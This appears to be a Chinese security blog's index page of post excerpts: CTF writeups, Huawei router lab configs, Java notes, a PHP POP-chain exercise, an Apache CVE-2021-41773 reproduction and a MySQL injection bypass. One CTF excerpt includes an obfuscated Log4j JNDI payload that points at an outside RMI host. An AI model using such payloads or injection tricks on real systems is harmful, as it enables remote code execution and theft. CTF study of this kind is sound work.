- 博客(529)
- 收藏
- 关注
原创 PHP反序列化构造POP链小练习
一个师傅给的源码,来源不知,就当作小练习记录一下<?phperror_reporting(0);class Vox{ protected $headset; public $sound; public function fun($pulse){ include($pulse); } public function __invoke(){ $this->fun($this->headset); }}.
2022-05-13 11:12:32
632
原创 华为eNSP动态路由OSPF小实验三
R1syssys R1int lo 0ip add 1.1.1.1 32int g0/0/0ip add 12.1.1.1 24quitospf 1 router 1.1.1.1area 1network 12.1.1.0 0.0.0.255network 1.1.1.1 0.0.0.0R2syssys R2int g0/0/0ip add 12.1.1.2 24int s4/0/0ip add 23.1.1.2 24quitospf 1 router 2.2.2.
2022-05-05 14:14:21
577
原创 华为eNSP动态路由OSPF小实验二
R1syssys R1int lo 0 ip add 1.1.1.1 32int g0/0/0ip add 12.1.1.1 24quitospf 1 router 1.1.1.1area 1network 1.1.1.1 0.0.0.0network 12.1.1.0 0.0.0.255R2syssys R2int g0/0/0ip add 12.1.1.2 24int g0/0/1ip add 23.1.1.2 24quitospf 1 router 2.2..
2022-05-04 15:31:24
439
原创 华为eNSP动态路由OSPF小实验一
首先在每个路由器的设置上添加一个Serial的接口添加完之后即可开始配置R1:systemsys R1int g0/0/0ip add 12.1.1.1 24int s4/0/0ip add 13.1.1.1 24int lo 0ip add 1.1.1.1 32quitospf 1 router 1.1.1.1area 0network 12.1.1.0 0.0.0.255network 13.1.1.0 0.0.0.255network 1.1.1.1 0.0.0.0.
2022-04-28 10:23:30
1014
原创 第二届网刃杯网络安全大赛 Writeup
MISC玩坏的winxpvmdk文件,用DiskGenius打开,找到Administrator用户的桌面的学习资料binwalk分析meiren.png,foremost分离继续binwalk分析,foremost分离f1ag.png分离出来的压缩包需要密码提示QQ有压缩包密码,但是在虚拟磁盘镜像中没有找到有安装过QQ这个软件,猜测可能在线登录过,所以就找唯一安装的浏览器Firefox的本地数据这里几个.db文件都不是.db文件,Navicat无法建立连接,几个.sqlite文
2022-04-25 17:37:34
4416
7
原创 2022DASCTF Apr X FATE 防疫挑战赛 Writeup
文章目录SimpleFlow熟悉的猫冰墩墩废物选手的misc做题记录SimpleFlow首先tcp.stream eq 50中分析传入的执行命令的变量是$s,也就是参数substr($_POST["g479cf6f058cf8"],2)找到对应的参数,然后去掉前面两位字符解码即可cd "/Users/chang/Sites/test";zip -P PaSsZiPWorD flag.zip ../flag.txt;echo [S];pwd;echo [E]得到压缩包密码:PaSsZi
2022-04-25 16:04:01
2148
2
原创 华为eNSP配置RIP综合实验
AR1配置:syssys AR1inter g0/0/0 ip add 172.16.4.2 24inter g0/0/1 ip add 172.16.1.1 24quitripversion 2network 172.16.0.0AR2配置:syssys AR2inter g0/0/0 ip add 172.16.4.3 24inter g0/0/1ip add 172.16.2.1 24quitripversion 2network 172.16.0.0.
2022-04-14 15:31:20
1748
原创 AntCTF x D^3CTF MISC部分Writeup
文章目录BadW3terWannaWaccaBadW3ter附件是wav,但是文件头有点问题,对比一下正常的wav即可发现前十六个字节被修改了第一行的内容猜测也是个有用的线索: CUY1nw31lai修改前十六个进制正常的wav文件头然后测试几个常见的wav文件隐写:SilentEye、Deepsound等稍微测试一下发现是DeepSound输入前面的到线索作为密码。得到flag.pngfile识别文件发现flag.png是TIFF文件PS可以选择打开TIFF文件首先有两
2022-03-08 09:21:48
1020
5
原创 BUUCTF:[安洵杯 2019]easy_serialize_php
https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php访问/index.php?f=highlight_file得到源码 <?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'
2022-03-03 19:51:10
706
原创 安装oh-my-zsh报错fatal: gnutls_handshake() failed: Error in the pull function的解决办法
安装oh-my-zsh时报错fatal: unable to access 'https://github.com/ohmyzsh/ohmyzsh.git/': gnutls_handshake() failed: Error in the pull function.Error: git clone of oh-my-zsh repo failed
2022-02-21 22:04:40
833
原创 HGAME 2022 Writeup
文章目录Level - Week1WEBMISC欢迎欢迎!热烈欢迎!这个压缩包有点麻烦好康的流量群青(其实是幽灵东京)CRYPTO新人赛,就没有存题目附件了,简单的记录一下解题过程吧Level - Week1WEBMISC欢迎欢迎!热烈欢迎!hgame{We1com3_t0_HG@ME_2O22}这个压缩包有点麻烦README.txtI don't know if it's a good idea to write down all the passwords.将pa
2022-01-28 20:58:35
6181
11
原创 【MISC】记一次自己以前出的一道题
今天突然翻到的很久以前给一位师傅学校出的校赛题目,想着直接删了太可惜了,就丢在博客这里把Havefun.zip压缩包有密码,弱口令123456直接解压出来happymisc.zip的密码根据提示是:fairytailPS:本人妖尾忠实粉丝^_^解压得到comment.txt很明显是base32,解码发现是zip文件的十六进制字节流的逆序直接用python处理一下转换成zip文件import structa = open("./coment.txt","r")#十六进制数据文件.
2022-01-28 19:32:53
978
2
原创 2022 RealWorld CTF体验赛Writeup
文章目录Digital Souvenirlog4flagBe-a-Database-Hackerthe Secrets of Memorybaby flaglabFlag ConsoleBe-a-Database-Hacker 2Java Remote DebuggerDigital Souvenirrwctf{RealWorldIsAwesome}log4flag有一些正则过滤网上bypass方法很多,随便找一个就行${${::-j}ndi:${lower:rmi}://vw3nw
2022-01-23 16:54:54
1640
原创 黑马程序员Java教程学习笔记(一)
文章目录黑马程序员Java学习笔记Java版本Java语言的跨平台原理JRE和JDKJDK的下载和安装HelloWorld案例注释关键字常量数据类型标识符类型转换运算符字符"+"操作字符串"+"操作复制运算符自增自减运算符关系运算符逻辑运算符三元运算符两只老虎三个和尚黑马程序员Java学习笔记Java版本Java(5.0):是更新力度很大的一个版本,直接让Java的发展进入了快车道Java(8.0):是公司中生产/开发环境使用的最多的版本Java(11.0):是Java学习者使用的最
2022-01-17 17:10:23
13633
2
原创 第二届BMZCTF公开赛-easymisc
文章目录题目设计解题步骤(Writeup)题目设计考察知识点:数据处理、wav文件头、高低振幅转换、LSB隐写题目思路:逆序字节流数据->wav文件->高低振幅转换->LSB隐写->异或测试以下是设计题目时所用到的脚本文件转换二进制01数据from binascii import *with open('1.png', 'rb') as f:#需要转换的文件 with open('bin.txt', 'w') as f1: hex_data = hexl
2022-01-02 17:09:10
3538
7
原创 2021年第二届赣网杯网络安全大赛MISC-Writeup
文章目录decodemastergwb-misc-lovemathgwb-misc3-testcatdecodemasterdecodemaster.docx的内容是wingding编码:https://lingojam.com/WingDingSllv we GMT gje dsh vc sim gzwspio!EHRw tfk koa sq om reocxeua lzdpuil. W rkwa xsg tqiewtc pb wznjurz o vwspmnwzmvem jegbmnwz
2021-12-06 23:31:11
6434
5
原创 第四届“安洵杯”网络安全挑战赛MISC-Writeup
文章目录WEBMISC应该算是签到CyzCC_loves_LOLCthulhu MythoslovemathWEBMISC应该算是签到B站搜索直接搜索这个BV号PS:出题人品味不错,我也喜欢酷玩的这首《Yellow》直接页面Ctrl+F没找出来搜索引擎找一下有没有通过API查弹幕的方法:https://www.bilibili.com/read/cv7923601F12点击Network,找到这个视频的cid从当前时间2021-11-27开始往前找https://api.bil
2021-11-29 22:54:57
5236
原创 西湖论剑2021中国杭州网络安全技能大赛部分Writeup
文章目录MISC真签到YUSA的小秘密Yusa的秘密WEB灏妹的webMISC真签到DASCTF{welc0m3_t0_9C51s_2021}YUSA的小秘密使用Stegsolve打开调整通道可以发现藏有flag;但是被干扰倒是无法看清搜索引擎查阅资料发现题目这里指的是一种叫YCrCb颜色编码模型参考[ByteCTF2020]Hardcore Watermark 01:https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJY
2021-11-21 12:38:48
9128
3
原创 “东华杯”2021年大学生网络安全邀请赛 暨第七届上海市大学生网络安全大赛线上赛MISC-Writeup
文章目录checkinprojectJumpJumpTigerwhere_can_find_codecheckin+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0-UTF-7编码UTF-7在线解码站:http://toolswebtop.com/text/process/decode/utf-7flag{dhb_7th}projecttest.exe附加了很多别的数据,运行之后发现生成了一个problem_bak.zip解压problem_bak.zi
2021-11-01 20:49:06
11079
8
原创 第四届“强网”拟态防御国际精英挑战赛MISC-mirror
full.png使用010 Editor打开出现CRC校验报错,猜测需要修复宽高,其次发现了文件末尾附加了镜像翻转的png字节流数据将附加数据提取出来另存为png文件,通过分析不难发现将字节流数据逆序然后每十六个字节流翻转一下即为正常的png数据使用Python简单处理from binascii import *with open('full1.png', 'rb') as f: with open('res-full.png', 'wb') as f1: hex_data = hexl.
2021-11-01 01:14:01
763
原创 2021年江西工业互联网安全技术技能大赛线下决赛部分Writeup
文章目录智能制造风力发电CTF火力发电厂智慧城市智能制造签到题,直接查找http流量包中的关键字http contains "flag"flag{jx2021}风力发电CTF题目描述风力发电机平时正常转速2500转每分钟,但有一天风力发电机转速异常,请从流量包中找出异常的转速流量之和。TCP总共14个流,其中有几个流有一些十六进制字符数据,转换字符没发现什么线索,也没发现什么规律,然后用Hex 转储发现第一个流的数据存在规律WireShark不方便做查找,复制到Sublime发
2021-10-19 18:00:17
748
1
原创 2021安全范儿高校挑战赛ByteCTF线上赛部分Writeup
文章目录MISC-CheckinMISC-SurveyMISC-HearingNotBelievingMISC-frequentlyWEB-double sqliMISC-CheckinByteCTF{Empower_Security_Enrich_Life}MISC-SurveyByteCTF{h0p3_y0u_Enjoy_our_ch4ll3n9es!}MISC-HearingNotBelievinghearing.wav使用Audacity打开,查看频谱图在开头发现二维码碎
2021-10-19 10:14:30
1149
3
原创 DASCTF:BitMap
来源于今天一位师傅给的题目附件,从解出来的flag只知道是安恒的题目,但是具体哪里的就不清楚了,觉得题目还有记录一下的价值BitMap文件很明显是bmp图片修改了BMP文件头和位图信息头,不过一些还原信息的必要数据位置还是给了出来的,比如位深度详细的还原过程可以参考我之前给白帽子社区端午节活动的出的题目:白帽子社区端午节活动-白帽寻宝记-纪念屈原Writeup这里可以添加一个后缀.bmp,然后使用010 Editor打开;借助010 Editor强大的插件分析功能,还是能显示出文件基本结构可以.
2021-10-14 23:01:12
1143
原创 CVE-2021-41773/Apache HTTP Server 路径穿越漏洞
自己的一次简单的漏洞复现记录学习请移步:https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.mdhttps://httpd.apache.org/security/vulnerabilities_24.html影响版本:=2.4.49利用条件:穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。.
2021-10-08 02:29:05
3956
原创 2021年江西工业互联网安全技术技能大赛线上初赛Writeup
文章目录协议分析S7协议分析工控流量分析异常流量分析应急处置图片的秘密现场数据采集应急恢复文件分析组态编程探索组态密码恶意程序恶意app分析恶意程序分析固件分析丢失的密码工业固件分析协议分析S7协议分析0300002402f080320100000003000e00050501120a100200010000830000000004000801。请解读以上协议内容,并准确的拿到此报文返回值,flag即为返回值。提交格式:flag{xxx}。写入报文的数据分析03 00
2021-10-05 15:32:33
2014
3
原创 记一次MySQL注入绕过
来源于今天一位朋友叫我帮忙看的题目查看源码发现提示存在过滤且,limit参数只能为单个数字fuzz一下sql注入关键字看看都过滤了哪些字符直接在class参数插入exp(100)回显正常,插入exp(1000)发现返回database error;说明此处sql注入可直接插入执行,其次如果sql语句执行错误会返回报错提示;那么就可以做布尔盲注了,但是比较棘手的是过滤了逗号,;不能使用if进行条件判断;绕过逗号的方法from x for y不能在if中使用。if无法使用可以用c.
2021-10-01 15:27:20
1900
7
原创 第四届江西省高校网络安全技能大赛初赛Web&Misc—Writeup
文章目录WebEasyPHPfunny_gameadminloginSellSystemMiscWebEasyPHPfunny_game保存下载页面后,在index.js中发现一个win()函数把内容拿出来放到控制台直接执行var _0x46ec=['PD4d','w7Nbwoh1w6IWw6gMwovDr8OFTFHCq8OWwrLDrwQMwrnClEcbw5LCm2DCuEU1wopOw5HDlMOqw4MCcQMmWg=='];var _0x1409=function(_0
2021-09-27 21:09:37
8803
14
原创 [纵横网络靶场社区]恶意软件后门分析
32位的exe文件,修改后缀为.exe,丢进ida里面分析;ida我也是不很懂,直接从start函数块开始分析返回了sub_402261()函数块的结果,继续看sub_402261()的内容发现这个函数块还是主要执行sub_402174(),继续查看sub_402174()函数块发现个ip,提交就对了。。。flag{5.39.218.152}...
2021-09-21 14:00:40
602
原创 [纵横网络靶场社区]组态软件分析
签到题,test.PCZ用file命令查看发现是zip文件修改后缀为zip,直接解压发现有密码。真加密但是仔细观察发现演示文稿文件夹没有加密,选定解压;直接在整个文件夹下找flagflag{D076-4D7E-92AC-A05ACB788292}...
2021-09-21 12:03:44
486
原创 [纵横网络靶场社区]S7COMM协议分析
签到题,过滤出s7comm协议,降序排包的长度,第一个包最后有一段hex解码得到:is_not_realflag{is_not_real}
2021-09-21 11:36:08
693
原创 [纵横网络靶场社区]奇怪的文件
part1、part2、part3很明显是zip文件的压缩源文件数据区、压缩源文件目录区、压缩源文件目录结束标志三个文件都补全50 4B两个字节,然后依次把part2、part3补全到part1文件中;修改part1文件名为part1.zip使用010 Editor打开,分析文件结构发现压缩源文件数据区的CRC字段为空、压缩源文件目录区的filename字段为空。CRC可以从压缩源文件目录区获得,filename字段可以从压缩源文件数据区获得。互相补全即可得到完整的zip文件。有加密,真加.
2021-09-21 10:32:02
534
原创 [纵横网络靶场社区]简单流量分析
每个ICMP包的data字段都带了一段不同的base64尝试解码了几段,发现啥也不是。之后的思路需要一点点脑洞,但是对于经验比较丰富的misc手来说也不难猜。经过仔细观察每个ICMP包中的data段中的base64长度都为十进制ASCII码的可显示字符范围。将这些ICMP请求包中的data字段数据提取出来,返回包的数据和请求包是一样的,提取的时候只提取请求包的即可使用tshark提取源地址为192.168.3.73的包的data字段:tshark -r fetus_pcap.pcap -Y '.
2021-09-20 13:58:18
624
原创 第三届第五空间网络安全大赛-选拔赛-部分Writeup
文章目录MISC签到alpha10BabyMimuzikoWEBWebFTPPNG图片转换器pklovecloudEasyCleanupyet_another_mysql_injectionMISC签到flag{welcometo5space}alpha10BabyMimuzikoWEBWebFTP目录扫描发现git泄露使用GitHack尝试还原代码发现无法还原源代码,但是发现了几个可以正常访问的文件,其中最为有用的就是这个探针:/Readme/mytz.php
2021-09-17 03:47:18
1704
1
原创 [纵横网络靶场社区]隐藏的黑客
upload文件夹是一堆webshell流量包含有部分HTTP流量,发现了一个webshell.zip;foremost尝试分离并没有直接分离出来,猜测可能混合了一些其他数据导致没有直接分离出zip文件。尝试导出HTTP对象导出的文件夹中发现一些字节流文件,其中发现了zip的字节流数据使用010 Editor打开,去掉前面5个干扰字节,重命名为flag.zip有加密,真加密;尝试爆破无果,猜测upload文件夹下的webshell密码中可能存在压缩包密码。Python简单处理提取出这些密码.
2021-09-16 09:24:51
923
1
原创 [纵横网络靶场社区]工控安全取证
使用file命令查看capture.log,发现是pcap文件,修改后缀为.pcap根据题目描述可以理解为两种意思:一个IP的第四次扫描第四个IP的第一次扫描分析流量包,发现了192.168.0.9、192.168.0.199、192.168.0.1、192.168.0.254共四个,流量包前面大部分都是192.168.0.9在进行SYN扫描192.168.0.99。如果题目意识是第一种意思,那么flag就应该为192.168.0.9的第四次扫描。第四次扫描的数据包编号是11,提交fla.
2021-09-15 09:04:39
790
原创 [纵横网络靶场社区]隐信道数据安全分析
附件flag-woody.mp3是一首歌,mp3格式,听了一下,Audacity打开看了一下没发现什么异常;mp3隐写试了一下也没什么线索。回到题目名称和描述。信道隐写,某种private的方式将信息传递出去。使用010 Editor打开,分析文件结构。可以发现在每个MPEG_FRAME mf下的4字节MPEG_HEADER mpeg_hdr中有一个1 bit的private bit,提取前8个MPEG_HEADER mpeg_hdr下的private bit即可得到01000110转换成十进制.
2021-09-14 09:52:48
671
原创 [纵横网络靶场社区]工控蜜罐日志分析
西门子私有通信协议是S7COMM,题目要求分析出日志中针对西门子私有通信协议扫描最多的IP,分析日志文件发现针对S7COMM的扫描日志记录都带有s7字样。所以只需要统计下带有s7字样的每一行中每个记录IP的次数,Pyhotn简单处理下即可from re import *with open('honeypot.log', 'r') as f: mydict, iplist = {}, [] lines = f.readlines() for line in lines: if 's7'..
2021-09-13 14:43:50
576
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人